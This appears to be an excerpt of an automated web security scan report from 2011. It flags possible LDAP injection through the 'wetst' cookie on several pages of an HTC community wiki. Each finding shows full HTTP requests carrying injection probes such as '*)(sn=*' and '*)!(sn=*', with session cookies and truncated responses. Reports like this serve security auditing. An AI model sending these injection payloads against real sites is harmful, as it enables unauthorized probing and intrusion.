<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <title>HTC Blue Angel - HTC Smartphone Wiki</title>

   <meta name="keywords" content="HTC Blue Angel - HTC Smartphone Wiki, Blue Angel,Smartphone" />
   <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
       
   <!-- Render IE8 like IE7 -->
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/CSSApplication/wpc.css?v=20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/family/f.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/skin/meadowgreen/s.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/core/c.css?20110120041852"; /*]]>*/</style>    
   
   <style type="text/css" media="print">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/print/p.css?20110120041852"; /*]]>*/</style>

   <script type="text/javascript">
//<![CDATA[
   var global_inits = {"NAMESPACE" : 'htcwiki',"WIKI_DISPLAY_NAME" : 'HTC Smartphone Wiki',"WIKI_URL" : 'http://htcwiki.wetpaint.com',"WIKI_URI" : '',"WIKI_BASE_URL" : 'http://static.wetpaint.com'.replace(/^(http:\/\/)[^\.]+/,'$1htcwiki'),"WIKI_HOMEPAGE_NAME" : 'HTC Smartphone Wiki',"WIKI_HOMEPAGE_DISPLAY_NAME" : 'Home',"WIKI_SKIN"
...[SNIP]...

2.3. http://htcwiki.wetpaint.com/page/HTC+Smartphone+Wiki/history [wetst cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://htcwiki.wetpaint.com
Path:   /page/HTC+Smartphone+Wiki/history

Issue detail

The wetst cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /page/HTC+Smartphone+Wiki/history HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=*)(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:02:15 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1RgUcALK9RCBCnNbZM/Rypn; Domain=htcwiki.wetpaint.com; Path=/
Set-Cookie: JSESSIONID=66B5CBC9BBBD8C7C01B9EDA22E06D15E; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:02:15 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 57599

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <title>HTC Smartphone Wiki - History Page - HTC Smartphone Wiki</title>

   <meta name="keywords" content="HTC Smartphone Wiki - History Page - HTC Smartphone Wiki, Android,Device home page,Home,Home page,HTC,Pocket PC,Smartphone" />
   <meta name="description" content="HTC Smartphone Wiki - HTC Smartphone Wiki - History Page" />
       
   <meta name="robots" content="noindex, nofollow" />
   <!-- Render IE8 like IE7 -->
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/CSSApplication/wpc.css?v=20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/family/f.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/skin/meadowgreen/s.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/core/c.css?20110120041852"; /*]]>*/</style>    
   
   <style type="text/css" media="print">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/print/p.css?20110120041852"; /*]]>*/</style>

   <script type="text/javascript">
//<![CDATA[
   var global_inits = {"NAMESPACE" : 'htcwiki',"WIKI_DISPLAY_NAME" : 'HTC Smartphone Wiki',"WIKI_URL" : 'http://htcwiki.wetpaint.com',"WIKI_URI" : '',"WIKI_BASE_URL" : 'http://static.wet
...[SNIP]...

Request 2

GET /page/HTC+Smartphone+Wiki/history HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=*)!(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:02:15 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1RgUcALK9RCBNDxtr28xs5l; Domain=htcwiki.wetpaint.com; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:02:15 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 57599

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <title>HTC Smartphone Wiki - History Page - HTC Smartphone Wiki</title>

   <meta name="keywords" content="HTC Smartphone Wiki - History Page - HTC Smartphone Wiki, Android,Device home page,Home,Home page,HTC,Pocket PC,Smartphone" />
   <meta name="description" content="HTC Smartphone Wiki - HTC Smartphone Wiki - History Page" />
       
   <meta name="robots" content="noindex, nofollow" />
   <!-- Render IE8 like IE7 -->
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/CSSApplication/wpc.css?v=20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/family/f.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/skin/meadowgreen/s.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/core/c.css?20110120041852"; /*]]>*/</style>    
   
   <style type="text/css" media="print">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/print/p.css?20110120041852"; /*]]>*/</style>

   <script type="text/javascript">
//<![CDATA[
   var global_inits = {"NAMESPACE" : 'htcwiki',"WIKI_DISPLAY_NAME" : 'HTC Smartphone Wiki',"WIKI_URL" : 'http://htcwiki.wetpaint.com',"WIKI_URI" : '',"WIKI_BASE_URL" : 'http://static.wetpaint.com'.replace(/^(http:\/\/)[^\.]+/,'$1htcwiki'),"WIKI_HOMEPA
...[SNIP]...

2.4. http://htcwiki.wetpaint.com/page/News%20&%20Notes [wetst cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://htcwiki.wetpaint.com
Path:   /page/News%20&%20Notes

Issue detail

The wetst cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /page/News%20&%20Notes HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=*)(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:03:02 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1RFmQnSxpCUDb0KQplXflNS; Domain=htcwiki.wetpaint.com; Path=/
Set-Cookie: JSESSIONID=29ACFDB542CC9D231636A2ABAB0EB558; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:03:02 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 48817

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <title>News &amp; Notes - HTC Smartphone Wiki</title>

   <meta name="keywords" content="News &amp; Notes - HTC Smartphone Wiki, HTC pocket pcs,HTC smartphones" />
   <meta name="description" content="Welcome to the HTC Wiki While this is a customer forum that is sponsored by HTC, HTC is not endorsing nor condoning any tweaks, hacks, 3rd party downloads, home..." />
       
   <!-- Render IE8 like IE7 -->
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/CSSApplication/wpc.css?v=20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/family/f.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/skin/meadowgreen/s.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/core/c.css?20110120041852"; /*]]>*/</style>    
   
   <style type="text/css" media="print">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/print/p.css?20110120041852"; /*]]>*/</style>

   <script type="text/javascript">
//<![CDATA[
   var global_inits = {"NAMESPACE" : 'htcwiki',"WIKI_DISPLAY_NAME" : 'HTC Smartphone Wiki',"WIKI_URL" : 'http://htcwiki.wetpaint.com',"WIKI_URI" : '',"WIKI_BASE_URL" : 'http://static.wetpaint.com'.repla
...[SNIP]...

Request 2

GET /page/News%20&%20Notes HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=*)!(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:03:02 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1RFmQnSxpCUDQlnXVdpGpvo; Domain=htcwiki.wetpaint.com; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:03:02 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 48816

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <title>News &amp; Notes - HTC Smartphone Wiki</title>

   <meta name="keywords" content="News &amp; Notes - HTC Smartphone Wiki, HTC pocket pcs,HTC smartphones" />
   <meta name="description" content="Welcome to the HTC Wiki While this is a customer forum that is sponsored by HTC, HTC is not endorsing nor condoning any tweaks, hacks, 3rd party downloads, home..." />
       
   <!-- Render IE8 like IE7 -->
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/CSSApplication/wpc.css?v=20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/family/f.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/skin/meadowgreen/s.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/core/c.css?20110120041852"; /*]]>*/</style>    
   
   <style type="text/css" media="print">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/print/p.css?20110120041852"; /*]]>*/</style>

   <script type="text/javascript">
//<![CDATA[
   var global_inits = {"NAMESPACE" : 'htcwiki',"WIKI_DISPLAY_NAME" : 'HTC Smartphone Wiki',"WIKI_URL" : 'http://htcwiki.wetpaint.com',"WIKI_URI" : '',"WIKI_BASE_URL" : 'http://static.wetpaint.com'.replace(/^(http:\/\/)[^\.]+/,'$1htcwiki'),"WIKI_HOMEPAGE_NAME" : 'HTC
...[SNIP]...

2.5. http://htcwiki.wetpaint.com/page/Sprint+Touch [wetst cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://htcwiki.wetpaint.com
Path:   /page/Sprint+Touch

Issue detail

The wetst cookie appears to be vulnerable to LDAP injection attacks.

The payloads e12e88b7f72b1e00)(sn=* and e12e88b7f72b1e00)!(sn=* were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /page/Sprint+Touch HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=e12e88b7f72b1e00)(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response 1

HTTP/1.1 301 http://htcwiki.wetpaint.com/page/HTC+Sprint+Touch
Date: Sat, 05 Feb 2011 16:03:54 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Tc3ngTgFfjbDVQBReKOu0D; Domain=htcwiki.wetpaint.com; Path=/
Set-Cookie: JSESSIONID=37D200DEA26CB516297F139E657C785E; Path=/
Location: http://htcwiki.wetpaint.com/page/HTC+Sprint+Touch
Content-Length: 0
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:03:54 GMT
Connection: close
Content-Type: text/html

Request 2

GET /page/Sprint+Touch HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=e12e88b7f72b1e00)!(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response 2

HTTP/1.1 301 http://htcwiki.wetpaint.com/page/HTC+Sprint+Touch
Date: Sat, 05 Feb 2011 16:03:54 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Tc3ngTgFfjbMkmEaMlpYtE; Domain=htcwiki.wetpaint.com; Path=/
Location: http://htcwiki.wetpaint.com/page/HTC+Sprint+Touch
Content-Length: 0
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:03:54 GMT
Connection: close
Content-Type: text/html


2.6. http://htcwiki.wetpaint.com/page/android+phones+thru+t-mobile [wetst cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://htcwiki.wetpaint.com
Path:   /page/android+phones+thru+t-mobile

Issue detail

The wetst cookie appears to be vulnerable to LDAP injection attacks.

The payloads 50260929ef7288ed)(sn=* and 50260929ef7288ed)!(sn=* were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /page/android+phones+thru+t-mobile HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=50260929ef7288ed)(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:06:51 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Tf1cEci1QjC1isFZiwJR4A; Domain=htcwiki.wetpaint.com; Path=/
Set-Cookie: JSESSIONID=050EE660B2200406206B1511BC1E48E0; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:06:51 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 32184

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <title>android phones thru t-mobile - HTC Smartphone Wiki</title>

   <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
       
   <meta name="robots" content="noindex, nofollow" />
   <!-- Render IE8 like IE7 -->
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/CSSApplication/wpc.css?v=20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/family/f.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/skin/meadowgreen/s.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/core/c.css?20110120041852"; /*]]>*/</style>    
   
   <style type="text/css" media="print">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/print/p.css?20110120041852"; /*]]>*/</style>

   <script type="text/javascript">
//<![CDATA[
   var global_inits = {"NAMESPACE" : 'htcwiki',"WIKI_DISPLAY_NAME" : 'HTC Smartphone Wiki',"WIKI_URL" : 'http://htcwiki.wetpaint.com',"WIKI_URI" : '',"WIKI_BASE_URL" : 'http://static.wetpaint.com'.replace(/^(http:\/\/)[^\.]+/,'$1htcwiki'),"WIKI_HOMEPAGE_NAME" : 'HTC Smartphone Wiki',"WIKI_HOMEPAGE_
...[SNIP]...

Request 2

GET /page/android+phones+thru+t-mobile HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=50260929ef7288ed)!(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:06:54 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Tf1cEci1QjC1VBXs5hLVz4; Domain=htcwiki.wetpaint.com; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:06:54 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 32182

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <title>android phones thru t-mobile - HTC Smartphone Wiki</title>

   <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
       
   <meta name="robots" content="noindex, nofollow" />
   <!-- Render IE8 like IE7 -->
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/CSSApplication/wpc.css?v=20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/family/f.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/skin/meadowgreen/s.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/core/c.css?20110120041852"; /*]]>*/</style>    
   
   <style type="text/css" media="print">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/print/p.css?20110120041852"; /*]]>*/</style>

   <script type="text/javascript">
//<![CDATA[
   var global_inits = {"NAMESPACE" : 'htcwiki',"WIKI_DISPLAY_NAME" : 'HTC Smartphone Wiki',"WIKI_URL" : 'http://htcwiki.wetpaint.com',"WIKI_URI" : '',"WIKI_BASE_URL" : 'http://static.wetpaint.com'.replace(/^(http:\/\/)[^\.]+/,'$1htcwiki'),"WIKI_HOMEPAGE_NAME" : 'HTC Smartphone Wiki',"WIKI_HOMEPAGE_DISPLAY_NAME" : 'Home',"WIKI_SKIN" : 'meadowgreen',"WIKI_STATUS"
...[SNIP]...

2.7. http://htcwiki.wetpaint.com/page/thread [wetst cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://htcwiki.wetpaint.com
Path:   /page/thread

Issue detail

The wetst cookie appears to be vulnerable to LDAP injection attacks.

The payloads 420ed5cc116574e)(sn=* and 420ed5cc116574e)!(sn=* were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /page/thread HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=420ed5cc116574e)(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response 1

HTTP/1.1 302 Moved Temporarily
Date: Sat, 05 Feb 2011 16:05:49 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TVUJ1bfy3T975VOKz4zdgk; Domain=htcwiki.wetpaint.com; Path=/
Set-Cookie: JSESSIONID=D0642FD589895DD7B949209A4F49E1D2; Path=/
Location: http://htcwiki.wetpaint.com/search/everything/thread?contains=thread
Content-Length: 0
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:05:49 GMT
Connection: close
Content-Type: text/html

Request 2

GET /page/thread HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=420ed5cc116574e)!(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response 2

HTTP/1.1 302 Moved Temporarily
